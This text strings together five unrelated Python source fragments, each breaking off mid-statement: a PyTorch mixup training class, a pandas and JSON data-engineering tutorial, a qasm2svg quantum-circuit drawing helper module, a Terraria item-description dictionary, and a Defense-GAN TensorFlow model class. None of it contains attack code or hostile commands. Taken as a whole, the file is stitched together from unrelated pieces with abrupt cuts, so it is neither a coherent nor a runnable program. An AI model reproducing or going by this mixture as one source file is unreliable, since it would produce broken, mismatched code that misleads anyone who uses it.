{}'.format(pretrained_k), logger='root') if self.backbone_k is not None: self.backbone_k.init_weights(pretrained=pretrained_k) # init trainable params if pretrained is not None: print_log('load model from: {}'.format(pretrained), logger='root') self.backbone.init_weights(pretrained=pretrained) self.neck_cls.init_weights() self.neck_mim.init_weights() self.head_cls.init_weights() self.head_mim.init_weights() if self.backbone_k is not None and pretrained_k is None: for param_q, param_k in zip(self.backbone.parameters(), self.backbone_k.parameters()): param_k.data.copy_(param_q.data) @torch.no_grad() def _update_loss_weights(self): """ update loss weights according to the cos_annealing scalar """ # cos annealing decent, from 1 to 0 for attr in self.loss_weights["decent_weight"]: setattr(self, attr, self.loss_weights[attr] * self.cos_annealing) # cos annealing accent, from 0 to 1 for attr in self.loss_weights["accent_weight"]: setattr(self, attr, self.loss_weights[attr] * (1-self.cos_annealing)) @torch.no_grad() def _momentum_update(self): """Momentum update of the backbone_k form backbone """ # we don't update q to k when momentum when m<0 if self.momentum_k < 0: return for param_q, param_k in zip(self.backbone.parameters(), self.backbone_k.parameters()): if self.momentum_k >= 1: param_k.data.copy_(param_q.data) else: param_k.data = param_k.data * self.momentum_k + \ param_q.data * (1. - self.momentum_k) def _features(self, img, gt_label=None, cur_mode="puzzlemix", **kwargs): """ generating feature maps or gradient maps """ if cur_mode == "attentivemix": img = F.interpolate(img, scale_factor=kwargs.get("feat_size", 224) / img.size(2), mode="bilinear") features = self.backbone_k(img)[-1] elif cur_mode == "puzzlemix": input_var = Variable(img, requires_grad=True) self.backbone.eval() self.head_cls.eval() pred = self.neck_cls([self.backbone(input_var)[-1]]) pred = self.head_cls(pred) loss = self.head_cls.loss(pred, gt_label)["loss"] loss.backward(retain_graph=False) features = torch.sqrt(torch.mean(input_var.grad**2, dim=1)) # grads # clear grads in models self.backbone.zero_grad() self.head_cls.zero_grad() # return to train self.backbone.train() self.head_cls.train() return features @torch.no_grad() def _manifoldmix(self, img, gt_label, alpha, cur_mode="manifoldmix"): """ pixel-wise manifoldmix for the latent space mixup backbone """ # manifoldmix lam = np.random.beta(alpha, alpha) bs = img.size(0) rand_index = torch.randperm(bs).cuda() # mixup labels y_a = gt_label y_b = gt_label[rand_index] gt_label = (y_a, y_b, lam) _layer = np.random.randint( self.mix_args[cur_mode]["layer"][0], self.mix_args[cur_mode]["layer"][1], dtype=int) # generate mixup mask _mask = None if img.size(3) > 64: # normal version of resnet scale_factor = 2**(1 + _layer) if _layer > 0 else 1 else: # CIFAR version scale_factor = 2**(_layer - 1) if _layer > 1 else 1 _mask_size = img.size(3) // scale_factor _mask = torch.zeros(img.size(0), 1, _mask_size, _mask_size).cuda() _mask[:] = lam return rand_index, _layer, _mask, gt_label def forward_mix(self, img, gt_label, mask=None, remove_idx=-1): """computate mini-batch mixup. Args: img (Tensor): Input images of shape (N, C, H, W). Typically these should be mean centered and std scaled. gt_label (Tensor): Ground-truth labels. mask (tensor): MIM mask. remove_idx (int): Remove this idx this time. Returns: dict[str, Tensor]: A dictionary of loss components. """ # choose a mixup method if self.mix_prob is None: candidate_list = self.idx_list.copy() if 0 <= remove_idx <= len(self.idx_list): candidate_list.remove(int(remove_idx)) cur_idx = random.choices(candidate_list, k=1)[0] else: rand_n = random.random() for i in range(len(self.idx_list)): if self.mix_prob[i] > rand_n: cur_idx = self.idx_list[i] if cur_idx == remove_idx: # randomly choose one among the rest candidate_list = self.idx_list.copy() candidate_list.remove(int(remove_idx)) cur_idx = random.choices(candidate_list, k=1)[0] break outputs = dict(cur_idx=cur_idx) cur_mode, cur_alpha = self.mix_mode[cur_idx], self.alpha[cur_idx] # applying dynamic methods if cur_mode in ["attentivemix", "automix", "puzzlemix", "samix",]: if cur_mode in ["attentivemix", "puzzlemix"]: features = self._features( img, gt_label=gt_label, cur_mode=cur_mode, **self.mix_args[cur_mode]) mix_args = dict(alpha=cur_alpha, dist_mode=False, features=features, **self.mix_args[cur_mode]) img, gt_label = eval(cur_mode)(img, gt_label, **mix_args) feat = self.backbone(img, mask) # hand-crafted methods elif cur_mode not in ["manifoldmix",]: if cur_mode in ["mixup", "cutmix", "saliencymix", "smoothmix",]: img, gt_label = eval(cur_mode)(img, gt_label, cur_alpha, dist_mode=False) elif cur_mode in ["resizemix", "fmix"]: mix_args = dict(alpha=cur_alpha, dist_mode=False, **self.mix_args[cur_mode]) img, gt_label = eval(cur_mode)(img, gt_label, **mix_args) else: assert cur_mode == "vanilla" feat = self.backbone(img, mask) else: # manifoldmix rand_index, _layer, _mask, gt_label = self._manifoldmix(img, gt_label, cur_alpha) # args for mixup backbone mix_args = dict( layer=_layer, cross_view=False, mask=_mask, BN_shuffle=False, idx_shuffle_BN=None, idx_shuffle_mix=rand_index, dist_shuffle=False) # TODO: Not support ManifoldMix now feat = self.backbone(img, mix_args) outputs['feat'] = feat # save mixed img if self.save and cur_mode != "vanilla": plot_lam = gt_label[2] if len(gt_label) == 3 else None self.plot_mix(img_mixed=img, mix_mode=cur_mode, lam=plot_lam) # mixup loss outs = self.neck_cls([feat[-1]], mask) outs = self.head_cls(outs) losses = self.head_cls.loss(outs, gt_label) losses['loss'] *= (self.weight_cls / self.mix_repeat) return losses, outputs def forward_train(self, img, gt_label, **kwargs): """Forward computation during
# Data Engineering Process # There are several steps in Data Engineering process. # Extract :- Data extraction is getting data from multiple sources. Ex. Data extraction from a website using Web scraping or gathering information from the data that are stored in different formats(JSON, CSV, XLSX etc.). # Transform :- Tarnsforming the data means removing the data that we don't need for further analysis and converting the data in the format that all the data from the multiple sources is in the same format. # Load :- Loading the data inside a data warehouse. Data warehouse essentially contains large volumes of data that are accessed to gather insights. # Working with different file formats # In real-world, people rarely get neat tabular data. Thus, it is mandatory # for any data scientist (or a data engineer) to be aware of different file # formats, common challenges in handling them and the best / efficient ways # to handle this data in real life. We have reviewed some of this content # in other modules. # File Format # A file format is a standard way in which information is encoded for # storage in a file. First, the file format specifies whether the file is a # binary or ASCII file. Second, it shows how the information is organized. # For example, comma-separated values (CSV) file format stores tabular data # in plain text. # To identify a file format, you can usually look at the file extension to # get an idea. For example, a file saved with name “Data” in “CSV” format # will appear as “Data.csv”. By noticing “.csv” extension we can clearly # identify that it is a “CSV” file and data is stored in a tabular format. # There are various formats for a dataset, .csv, .json, .xlsx etc. The # dataset can be stored in different places, on your local machine or # sometimes online. # In this section, you will learn how to load a dataset into our Jupyter # Notebook. # Now, we will look at some file formats and how to read them in Python: # Comma-separated values(CSV) file format # Comma-separated values file format falls under spreadsheet file format. # In spreadsheet file format, data is stored in cells. Each cell is # organized in rows and columns. A column in the spreadsheet file can have # different types. For example, a column can be of string type, a date type # or an integer type. # Each line in CSV file represents an observation or commonly called a # record. Each record may contain one or more fields which are separated by # a comma. # Reading the data from CSV in Python # The Pandas Library is a useful tool that enables us to read various # datasets into a data frame # Let us look at how to read a CSV file in Pandas Library. # We use pandas.read_csv() function to read the csv file. In the bracket, # we put the file path along with a quotation mark, so that pandas will # read the file into a data frame from that address. The file path can be # either an URL or your local file address. import pandas as pd url ='https://cf-courses-data.s3.us.cloud-object-storage.appdomain.cloud/IBMDeveloperSkillsNetwork-PY0101EN-SkillsNetwork/labs/Module%205/data/addresses.csv' df = pd.read_csv(url) df # Adding column name to the DataFrame # We can add columns to an existing DataFrame using its columns attribute. df.columns =['First Name', 'Last Name', 'Location ', 'City','State','Area Code'] df # Selecting a single column # To select the first column 'First Name', you can pass the column name as # a string to the indexing operator. df["First Name"] # Selecting multiple columns # To select multiple columns, you can pass a list of column names to the # indexing operator. df = df[['First Name', 'Last Name', 'Location ', 'City','State','Area Code']] df # Selecting rows using .iloc and .loc # Now, let's see how to use .loc for selecting rows from our DataFrame. # loc() : loc() is label based data selecting method which means that we # have to pass the name of the row or column which we want to select. # To select the first row df.loc[0] # To select the 0th,1st and 2nd row of "First Name" column only df.loc[[0,1,2], "First Name" ] # Now, let's see how to use .iloc for selecting rows from our DataFrame. # iloc() : iloc() is a indexed based selecting method which means that we # have to pass integer index in the method to select specific row/column. # To select the 0th,1st and 2nd row of "First Name" column only df.iloc[[0,1,2], 0] # Transform Function in Pandas # Python’s Transform function returns a self-produced dataframe with # transformed values after applying the function specified in its parameter. # Let's see how Transform function works. #import library import pandas as pd import numpy as np #creating a dataframe df=pd.DataFrame(np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]]), columns=['a', 'b', 'c']) df # Let’s say we want to add 10 to each element in a dataframe: # applying the transform function df = df.transform(func = lambda x : x + 10) df # Now we will use DataFrame.transform() function to find the square root # to each element of the dataframe. result = df.transform(func = ['sqrt']) result # JSON file Format # JSON (JavaScript Object Notation) is a lightweight data-interchange format. # It is easy for humans to read and write. # # JSON is built on two structures: # A collection of name/value pairs. In various languages, this is realized as an object, record, struct, dictionary, hash table, keyed list, or associative array. # An ordered list of values. In most languages, this is realized as an array, vector, list, or sequence. # JSON is a language-independent data format. It was derived from # JavaScript, but many modern programming languages include code to # generate and parse JSON-format data. It is a very common data format, # with a diverse range of applications. # The text in JSON is done through quoted string which contains the value # in key-value mapping within { }. It is similar to the dictionary in # Python. # Python supports JSON through a built-in package called json. To use this # feature, we import the json package in Python script. import json # Writing JSON to a File # This is usually called serialization. It is the process of converting an # object into a special format which is suitable for transmitting over the # network or storing in file or database. # To handle the data flow in a file, the JSON library in Python uses dump() # or dumps() function to convert the Python objects into their respective # JSON object, so it makes easy to write data to files. import json person = { 'first_name' : 'Mark', 'last_name' : 'abc', 'age' : 27, 'address': { "streetAddress": "21 2nd Street", "city": "New York", "state": "NY", "postalCode": "10021-3100" } } # serialization using dump() function # json.dump() method can be used for writing to JSON file. # Syntax: json.dump(dict, file_pointer) # Parameters: # dictionary – name of dictionary which should be converted to JSON object. # file pointer – pointer of the file opened in write or append mode. with open('person.json', 'w') as f: # writing JSON object json.dump(person, f) # serialization using dumps() function # json.dumps() that helps in converting a dictionary to a JSON object. # It takes two parameters: # dictionary – name of dictionary which should be converted to JSON object. # indent – defines the number of units for indentation # Serializing json json_object = json.dumps(person, indent = 4) # Writing to sample.json with open("sample.json", "w") as outfile: outfile.write(json_object) print(json_object) # Our Python objects are now serialized to the file. To deserialize it back # to the Python object we use the load() function. #Reading JSON to a File # This process is usually called Deserialization: It is the reverse of # serialization. It converts the special format returned by the # serialization back into a usable object. # Using json.load() # The JSON package has json.load() function that loads the json content from a json file into a
<gh_stars>1-10 # ====================================================================== # Copyright CERFACS (February 2018) # Contributor: <NAME> (<EMAIL>) # # This software is governed by the CeCILL-B license under French law and # abiding by the rules of distribution of free software. You can use, # modify and/or redistribute the software under the terms of the # CeCILL-B license as circulated by CEA, CNRS and INRIA at the following # URL "http://www.cecill.info". # # As a counterpart to the access to the source code and rights to copy, # modify and redistribute granted by the license, users are provided # only with a limited warranty and the software's author, the holder of # the economic rights, and the successive licensors have only limited # liability. # # In this respect, the user's attention is drawn to the risks associated # with loading, using, modifying and/or developing or reproducing the # software by the user in light of its specific status of free software, # that may mean that it is complicated to manipulate, and that also # therefore means that it is reserved for developers and experienced # professionals having in-depth computer knowledge. Users are therefore # encouraged to load and test the software's suitability as regards # their requirements in conditions enabling the security of their # systems and/or data to be ensured and, more generally, to use and # operate it in the same conditions as regards security. # # The fact that you are presently reading this means that you have had # knowledge of the CeCILL-B license and that you accept its terms. # ====================================================================== """This module groups useful functions for qasm2svg. The functions here are used in many places in the code of qasm2svg and needed to be in a separate module. """ import os from typing import Tuple, Sequence, Union from qasm2image.svg import _constants, _types QubitType = Tuple[str, int] def get_x_from_index(index: int) -> int: """Compute the x-coordinate with the provided x index. This method compute the x coordinate associated with the given x index. The returned value has the same dimension as the constants provided in _constants.py. Parameters: index (int): The circuit representation is divided in columns. In each column fits a gate and some additional space for gate separation. The provided index represent the column in which we want to plot. Returns: int: The *center* of the column that corresponds to the given index. ___________ | | | | | | | | ‾‾‾‾‾‾‾‾‾‾‾ ^ ^ | returned value not returned value """ x_coord = _constants.REGISTER_NAME_WIDTH x_coord += _constants.GATE_LEFT_BORDER x_coord += index * ( _constants.GATE_SIZE + _constants.GATE_HORIZONTAL_SPACING) x_coord += _constants.GATE_SIZE / 2 return x_coord def get_y_from_quantum_register(qreg_index_in_json: int, bit_mapping: dict) -> int: """Compute the y-coordinate associated to the given quantum register. This method assumes that all the quantum registers are drawn *before* the classical ones. Parameter: quantum_register_index_in_JSON (int): identifier of the quantum register from the JSON circuit representation. bit_mapping (dict): the map that stores the correspondances between bits indices in the JSON circuit and the desired output indices. Structure: {'qubits': {index_in_JSON : index_in_drawing}, 'clbits': {index_in_JSON : index_in_drawing}} Returns: int: The y-coordinate of the line representing the quantum register number quantum_register_index. """ y_coord = _constants.VERTICAL_BORDER index_to_draw = bit_mapping['qubits'][qreg_index_in_json] y_coord += index_to_draw * _constants.REGISTER_LINES_VERTICAL_SPACING return y_coord def get_y_from_classical_register(clreg_index_in_json: int, quantum_registers_number: int, bit_mapping: dict) -> int: """Compute the y-coordinate associated to the given classical register. This method assumes that all the quantum registers are drawn *before* the classical ones. Parameters: clreg_index_in_json (int): identifier of the classical from the JSON circuit representation. quantum_registers_number (int): Number of quantum registers in the circuit. bit_mapping (dict): the map that stores the correspondances between bits indices in the JSON circuit and the desired output indices. Structure: {'qubits': {index_in_JSON : index_in_drawing}, 'clbits': {index_in_JSON : index_in_drawing}} Returns: int: The y-coordinate of the line representing the classical register number classical_register_index. """ y_coord = _constants.VERTICAL_BORDER cl_index_to_draw = bit_mapping['clbits'][clreg_index_in_json] index_to_draw = quantum_registers_number + cl_index_to_draw y_coord += index_to_draw * _constants.REGISTER_LINES_VERTICAL_SPACING return y_coord def get_dimensions(json_circuit, show_clbits: bool) -> Tuple[int, int]: """Compute the width and height of the given circuit. Parameter: json_circuit (dict): JSON representation of the circuit. Can be obtained from the QASM representation by the following lines of code: # qasm_str is the string containing the QASM code. ast = qiskit.qasm.Qasm(data = qasm_str).parse() u = qiskit.unroll.Unroller(ast, qiskit.unroll.JsonBackend(basis)) u.execute() json_circuit = u.backend.circuit show_clbits (bool): Flag set to True if the method should also draw classical bits. Returns: tuple: The computed width and height of the given circuit. """ circuit_gates_number = _get_circuit_width(json_circuit) register_number = json_circuit['header'].get('number_of_qubits', 0) if show_clbits: register_number += json_circuit['header'].get('number_of_clbits', 0) width = _constants.REGISTER_NAME_WIDTH width += _constants.GATE_LEFT_BORDER width += circuit_gates_number * ( _constants.GATE_SIZE + _constants.GATE_HORIZONTAL_SPACING) width -= _constants.GATE_HORIZONTAL_SPACING width += _constants.GATE_RIGHT_BORDER height = _constants.VERTICAL_BORDER height += (register_number - 1) * _constants.REGISTER_LINES_VERTICAL_SPACING height += _constants.VERTICAL_BORDER return width, height def _get_circuit_width(json_circuit) -> int: """Compute the width of the given circuit. The returned width is not: 1) A number of pixel (or cm, mm, ...) 2) The *minimum* number of time steps needed to complete the circuit. Here the "width" is the number of columns needed to *represent clearly* the circuit. One situation where the returned integer does not correspond to the definition given in 2) above could be cx q[0], q[5]; cx q[1], q[6]; The 2 instructions above are completely independent and could be performed in parallel (in one time step). But the graphic representations of these 2 instructions overlap: the CNOT lines will overlap between the qubits 1 and 5. This situation will then output a "width" of 2, even if the width of the circuit in the sense of quantum computing is 1. Parameters: json_circuit (dict): JSON representation of the circuit. Can be obtained from the QASM representation by the following lines of code: # qasm_str is the string containing the QASM code. ast = qiskit.qasm.Qasm(data = qasm_str).parse() u = qiskit.unroll.Unroller(ast, qiskit.unroll.JsonBackend(basis)) u.execute() json_circuit = u.backend.circuit Returns: int: The computed width of the given circuit. """ clbits_number = json_circuit['header'].get('number_of_clbits', 0) qubits_number = json_circuit['header'].get('number_of_qubits', 0) index_last_gate_on_reg = { 'clbits': [0] * max(clbits_number, 1), 'qubits': [0] * max(qubits_number, 1)} # For each instruction for instruction in json_circuit['instructions']: _update_data_structure(index_last_gate_on_reg, instruction) return max(max(index_last_gate_on_reg['clbits']), max(index_last_gate_on_reg['qubits'])) def get_max_index(bit_gate_rank: _types.BitRankType, instruction=None, qubits=None, clbits=None) -> \ Tuple[int, Tuple[int, int, int, int]]: """Compute the maximum x index with an overlap. The maximum x index with an overlap is the maximum column index where the representation of the 'instruction' (see below) would overlap with an already drawn gate representation. The algorithm to determine the 'instruction' is: 1) If the instruction parameter is not None, then data is extracted from it. 2) If the instruction parameter is None and at least one of the qubits and clbits parameters is set, then data is extracted from the qubits and clbits parameters. 3) Else, an exception is raised. Parameters: bit_gate_rank (dict): Dictionnary representing the column index of the last drawn gate for each bit. Structure: {'qubits' : [ 3, # last drawn gate on the first qubit # is in the third column. 2, ..., 10 ], # last drawn gate on the last qubit # is in the tenth column. 'clbits' : [ 1, # last drawn gate on the first classical # bit is on the first column. ..., 0 ] } instruction (dict): Dictionnary representing the current instruction. Structure: see qiskit data structures. qubits (list): A list of quantum bits. clbits (list): A list of classical bits. Returns: tuple: (max_index, (minq, maxq, minc, maxc)): - max_index (int): the maximum x index with an overlap. - minq (int): smallest qubit index used. - maxq (int): greatest qubit index used. - minc (int): smallest classical bit index used. - maxc (int): greatest classical bit index used. You can iterate on all the register indexes where something will be drawn with for qreg_index in range(minq, maxq+1): # code for creg_index in range(minq, maxq+1): # code The ranges can be empty, i.e. it is possible that minq = 0 and maxq = -1 or minc = 0 and maxc = -1. Raises: RuntimeError: when no instruction, no qubits and no clbits are given
# "Skeleton Statue": "", # "Reaper Statue": "", # "Woman Statue": "", # "Imp Statue": "", # "Gargoyle Statue": "", # "Gloom Statue": "", # "Hornet Statue": "", # "Bomb Statue": "", # "Crab Statue": "", # "Hammer Statue": "", # "Potion Statue": "", # "Spear Statue": "", # "Cross Statue": "", # "Jellyfish Statue": "", # "Bow Statue": "", # "Boomerang Statue": "", # "Boot Statue": "", # "Chest Statue": "", # "Bird Statue": "", # "Axe Statue": "", # "Corrupt Statue": "", # "Tree Statue": "", # "Anvil Statue": "", # "Pickaxe Statue": "", # "Mushroom Statue": "", # "Eyeball Statue": "", # "Pillar Statue": "", # "Heart Statue": "", # "Pot Statue": "", # "Sunflower Statue": "", # "King Statue": "", # "Queen Statue": "", # "Piranha Statue": "", # "Planked Wall": "", # "Wooden Beam": "", # "Adamantite Repeater": "", # "Adamantite Sword": "", # "Cobalt Sword": "", # "Mythril Sword": "", # "Moon Charm": "", # "Ruler": "", # "Crystal Ball": "", # "Disco Ball": "", # "Sorcerer Emblem": "", # "Warrior Emblem": "", # "Ranger Emblem": "", # "Demon Wings": "", # "Angel Wings": "", # "Magical Harp": "", # "Rainbow Rod": "", # "Ice Rod": "", # "Neptune's Shell": "", # "Mannequin": "", # "Greater Healing Potion": "", # "Greater Mana Potion": "", # "Pixie Dust": "", # "Crystal Shard": "", # "Clown Hat": "", # "Clown Shirt": "", # "Clown Pants": "", # "Flamethrower": "", # "Bell": "", # "Harp": "", # "Red Wrench": "", # "Wire Cutter": "", # "Active Stone Block": "", # "Inactive Stone Block": "", # "Lever": "", # "Laser Rifle": "", # "Crystal Bullet": "", "Holy Arrow": "made with 200 wooden arrow, 3 pixie dust and 1 unicorn horn", # "Magic Dagger": "", # "Crystal Storm": "", # "Cursed Flames": "", # "Soul of Light": "", # "Soul of Night": "", # "Cursed Flame": "", "Cursed Torch": "cursed torches are made with 33 torches and 1 cursed flame", # "Adamantite Forge": "", # "Mythril Anvil": "", # "Unicorn Horn": "", # "Dark Shard": "", # "Light Shard": "", # "Red Pressure Plate": "", # "Wire": "", # "Spell Tome": "", # "Star Cloak": "", # "Megashark": "", # "Shotgun": "", # "Philosopher's Stone": "", # "Titan Glove": "", # "Cobalt Naginata": "", # "Switch": "", # "Dart Trap": "", # "Boulder": "", # "Green Pressure Plate": "", # "Gray Pressure Plate": "", # "Brown Pressure Plate": "", # "Mechanical Eye": "", "Cursed Arrow": "made with 150 wooden arrow and 1 cursed flame", "Cursed Bullet": "", "Soul of Fright": "soul of fright is dropped by defeating skeletron prime", "Soul of Might": "soul of might is dropped by defeating destoryer of worlds", "Soul of Sight": "soul of sight is dropped by defeating the twins", # "Gungnir": "", # "Hallowed Plate Mail": "", # "Hallowed Greaves": "", # "Hallowed Helmet": "", # "Cross Necklace": "", # "Mana Flower": "", # "Mechanical Worm": "", # "Mechanical Skull": "", # "Hallowed Headgear": "", # "Hallowed Mask": "", # "Slime Crown": "", # "Light Disc": "", # "Music Box (Overworld Day)": "", # "Music Box (Eerie)": "", # "Music Box (Night)": "", # "Music Box (Title)": "", # "Music Box (Underground)": "", # "Music Box (Boss 1)": "", # "Music Box (Jungle)": "", # "Music Box (Corruption)": "", # "Music Box (Underground Corruption)": "", # "Music Box (The Hallow)": "", # "Music Box (Boss 2)": "", # "Music Box (Underground Hallow)": "", # "Music Box (Boss 3)": "", # "Soul of Flight": "", # "Music Box": "", # "Demonite Brick": "", # "Hallowed Repeater": "", # "Drax": "", # "Explosives": "", # "Inlet Pump": "", # "Outlet Pump": "", # "1 Second Timer": "", # "3 Second Timer": "", # "5 Second Timer": "", # "Candy Cane Block": "", # "Candy Cane Wall": "", # "Santa Hat": "", # "Santa Shirt": "", # "Santa Pants": "", # "Green Candy Cane Block": "", # "Green Candy Cane Wall": "", # "Snow Block": "", # "Snow Brick": "", # "Snow Brick Wall": "", # "Blue Light": "", # "Red Light": "", # "Green Light": "", # "Blue Present": "", # "Green Present": "", # "Yellow Present": "", # "Snow Globe": "", # "Carrot": "", # "Adamantite Beam": "", # "Adamantite Beam Wall": "", # "Demonite Brick Wall": "", # "Sandstone Brick": "", # "Sandstone Brick Wall": "", # "Ebonstone Brick": "", # "Ebonstone Brick Wall": "", # "Red Stucco": "", # "Yellow Stucco": "", # "Green Stucco": "", # "Gray Stucco": "", # "Red Stucco Wall": "", # "Yellow Stucco Wall": "", # "Green Stucco Wall": "", # "Gray Stucco Wall": "", # "Ebonwood": "", # "<NAME>any": "", # "Pearlwood": "", # "Ebonwood Wall": "", # "Rich Mahogany Wall": "", # "Pearlwood Wall": "", # "Ebonwood Chest": "", # "Rich Mahogany Chest": "", # "Pearlwood Chest": "", # "Ebonwood Chair": "", # "Rich Mahogany Chair": "", # "Pearlwood Chair": "", # "Ebonwood Platform": "", # "Rich Mahogany Platform": "", # "Pearlwood Platform": "", # "Bone Platform": "", # "Ebonwood Work Bench": "", # "Rich Mahogany Work Bench": "", # "Pearlwood Work Bench": "", # "Ebonwood Table": "", # "Rich Mahogany Table": "", # "Pearlwood Table": "", # "Ebonwood Piano": "", # "<NAME> Piano": "", # "Pearlwood Piano": "", # "Ebonwood Bed": "", # "Rich Mahogany Bed": "", # "Pearlwood Bed": "", # "Ebonwood Dresser": "", # "Rich Mahogany Dresser": "", # "Pearlwood Dresser": "", # "Ebonwood Door": "", # "Rich Mahogany Door": "", # "Pearlwood Door": "", # "Ebonwood Sword": "", # "Ebonwood Hammer": "", # "Ebonwood Bow": "", # "Rich Mahogany Sword": "", # "Rich Mahogany Hammer": "", # "Rich Mahogany Bow": "", # "Pearlwood Sword": "", # "Pearlwood Hammer": "", # "Pearlwood Bow": "", # "Rainbow Brick": "", # "Rainbow Brick Wall": "", # "Ice Block": "", # "Red's Wings": "", # "Red's Helmet": "", # "Red's Breastplate": "", # "Red's Leggings": "", # "Fish": "", # "Ice Boomerang": "", # "Keybrand": "", # "Cutlass": "", # "Boreal Wood Work Bench": "", # "True Excalibur": "", # "True Night's Edge": "", # "Frostbrand": "", # "Boreal Wood Table": "", # "Red Potion": "", # "Tactical Shotgun": "", # "Ivy Chest": "", # "Ice Chest": "", # "Marrow": "", # "Unholy Trident": "", # "Frost Helmet": "", # "Frost Breastplate": "", # "Frost Leggings": "", # "Tin Helmet": "", # "Tin Chainmail": "", # "Tin Greaves": "", # "Lead Helmet": "", # "Lead Chainmail": "", # "Lead Greaves": "", # "<NAME>": "", # "<NAME>": "", # "<NAME>": "", # "Platinum Helmet": "", # "Platinum Chainmail": "", # "Platinum Greaves": "", "Tin Ore": "tin ore can be found on or near the surface, in the cavern biome or underground and can be mined with any pickaxe.", # "Lead Ore": "", # "Tungsten Ore": "", "Platinum Ore": "platinum ore can be found underground", "Tin Bar": "A tin bar can be made using the furnace to smelt three tin ore", # "Lead Bar": "", # "Tungsten Bar": "", "Platinum Bar": "A platinum bar can be made using the furnace to smelt four platinum ore.", # "Tin Watch": "", # "Tungsten Watch": "", # "Platinum Watch": "", # "Tin Chandelier": "", # "Tungsten Chandelier": "", # "Platinum Chandelier": "", # "Platinum Candle": "", # "Platinum Candelabra": "", # "Platinum Crown": "", # "Lead Anvil": "", # "Tin Brick": "", # "Tungsten Brick": "", # "Platinum Brick": "", # "Tin Brick Wall": "", # "Tungsten Brick Wall": "", # "Platinum Brick Wall": "", # "Beam Sword": "", # "Ice Blade": "", # "Ice Bow": "", # "Frost Staff": "", # "Wood Helmet": "", # "Wood Breastplate": "", # "Wood
# Copyright 2018 The Defense-GAN Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================= """Contains the GAN implementations of the abstract model class.""" import cPickle import os import time import numpy as np import tensorflow as tf from tensorflow.contrib import slim import tflib import tflib.cifar10 import tflib.mnist import tflib.plot import tflib.save_images from datasets.utils import get_generators from models.base_model import AbstractModel from models.dataset_models import mnist_generator, celeba_discriminator, \ mnist_discriminator, celeba_generator from utils.misc import ensure_dir from utils.visualize import save_images_files class DefenseGANBase(AbstractModel): def __init__(self, cfg=None, test_mode=False, verbose=True, **args): default_attributes = ['dataset_name', 'batch_size', 'use_bn', 'test_batch_size', 'mode', 'gradient_penalty_lambda', 'train_iters', 'critic_iters', 'latent_dim', 'net_dim', 'input_transform_type', 'debug', 'rec_iters', 'image_dim', 'rec_rr', 'rec_lr', 'test_again', 'loss_type', 'attribute'] self.dataset_name = None # Name of the datsaet. self.batch_size = 32 # Batch size for training the GAN. self.use_bn = True # Use batchnorm in the discriminator and generator. self.test_batch_size = 20 # Batch size for test time. self.mode = 'gp-wgan' # The mode of training the GAN (default: gp-wgan). self.gradient_penalty_lambda = 10.0 # Gradient penalty scale. self.train_iters = 30000 # Number of training iterations. self.critic_iters = 5 # Critic iterations per training step. self.latent_dim = None # The dimension of the latent vectors. self.net_dim = None # The complexity of network per layer. self.input_transform_type = 0 # The normalization used for the inputs. self.debug = False # Debug info will be printed. self.rec_iters = 200 # Number of reconstruction iterations. self.image_dim = [None, None, None] # [height, width, number of channels] of the output image. self.rec_rr = 10 # Number of random restarts for the reconstruction self.rec_lr = 10.0 # The reconstruction learning rate. self.test_again = False # If true, do not use the cached info for test phase. self.attribute = 'gender' # Should be implemented in the child classes. self.discriminator_fn = None self.generator_fn = None self.train_data_gen = None self.model_save_name = 'GAN.model' super(DefenseGANBase, self).__init__(default_attributes, test_mode=test_mode, verbose=verbose, cfg=cfg, **args) self.save_var_prefixes = ['Generator', 'Discriminator'] if self.mode == 'enc': saver = tf.train.Saver( var_list=self.generator_vars + self.enc_params) else: saver = tf.train.Saver(var_list=self.generator_vars) self.load_generator = lambda ckpt_path=None: self.load( checkpoint_dir=ckpt_path, saver=saver) self._load_dataset() def _build_generator_discriminator(self): """Creates the generator and discriminator graph per dataset.""" pass def _load_dataset(self): """Loads the dataset.""" pass def _build(self): """Builds the computation graph.""" assert (self.batch_size % self.rec_rr) == 0, 'Batch size ' \ 'should be ' \ 'divisable by ' \ 'random restart' self.test_batch_size = self.batch_size # Defining batch_size in input placeholders is inevitable at least # for now, because the z vectors are Tensorflow variables. self.real_data_pl = tf.placeholder( tf.float32, shape=[self.batch_size] + self.image_dim, ) self.real_data_test_pl = tf.placeholder( tf.float32, shape=[self.test_batch_size] + self.image_dim, ) self.input_pl_transform() self._build_generator_discriminator() self.fake_data = self.generator_fn() self.disc_real = self.discriminator_fn(self.real_data) with tf.variable_scope(tf.get_variable_scope(), reuse=True): sc = tf.get_variable_scope() sc.reuse_variables() self.disc_fake = self.discriminator_fn(self.fake_data) self.generator_vars = slim.get_variables('Generator') self.discriminator_vars = slim.get_variables('Discriminator') self.fixed_noise = tf.constant( np.random.normal(size=(128, self.latent_dim)).astype( 'float32')) self.fixed_noise_samples = self.generator_fn(self.fixed_noise, is_training=False) def _loss(self): """Builds the loss part of the graph..""" self.discriminator_cost = 0 self.generator_cost = 0 if self.mode == 'wgan': self.generator_cost = -tf.reduce_mean(self.disc_fake) self.discriminator_cost = tf.reduce_mean( self.disc_fake) - tf.reduce_mean( self.disc_real) self.gen_train_op = tf.train.RMSPropOptimizer( learning_rate=5e-5 ).minimize(self.generator_cost, var_list=self.generator_vars) self.disc_train_op = tf.train.RMSPropOptimizer( learning_rate=5e-5 ).minimize(self.discriminator_cost, var_list=self.discriminator_vars) clip_ops = [] for var in tflib.params_with_name('Discriminator'): clip_bounds = [-.01, .01] clip_ops.append( tf.assign( var, tf.clip_by_value(var, clip_bounds[0], clip_bounds[1]) ) ) self.clip_disc_weights = tf.group(*clip_ops) elif self.mode == 'wgan-gp': self.generator_cost = -tf.reduce_mean(self.disc_fake) disc_cost = tf.reduce_mean(self.disc_fake) - tf.reduce_mean( self.disc_real) alpha = tf.random_uniform( shape=[self.batch_size, 1, 1, 1], minval=0., maxval=1. ) differences = self.fake_data - self.real_data interpolates = self.real_data + (alpha * differences) gradients = \ tf.gradients(self.discriminator_fn(interpolates), [interpolates])[0] slopes = tf.sqrt( tf.reduce_sum(tf.square(gradients), reduction_indices=[1])) gradient_penalty = tf.reduce_mean((slopes - 1.) ** 2) self.discriminator_cost = disc_cost + \ self.gradient_penalty_lambda * \ 